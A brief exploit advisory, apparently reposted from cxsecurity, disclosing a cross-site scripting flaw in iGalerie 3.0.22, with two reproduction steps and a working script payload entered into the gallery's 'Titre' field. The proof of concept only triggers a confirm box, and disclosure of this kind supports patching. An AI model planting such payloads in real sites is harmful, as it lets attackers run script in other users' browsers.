iGalerie 3.0.22 Cross Site Scripting
2024-1-11 05:58:9 Author: cxsecurity.com(查看原文) 阅读量:1 收藏

iGalerie 3.0.22 Cross Site Scripting

# Exploit Title: iGalerie Version: 3.0.22 - Reflected XSS # Date: 2024-7-1 # Exploit Author: tmrswrr # Vendor Homepage: https://www.igalerie.org/ # Version: 3.0.22 # Tested on: https://softaculous.com/demos/iGalerie 1 ) Go to home page and click edit > https://127.0.0.1/iGalerie/ Titre : "><sVg/onLy=1 onLoaD=confirm(1)// 2 ) Write in titre your payload , after save will be see alert button.



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2024010034
如有侵权请联系:admin#unsafe.sh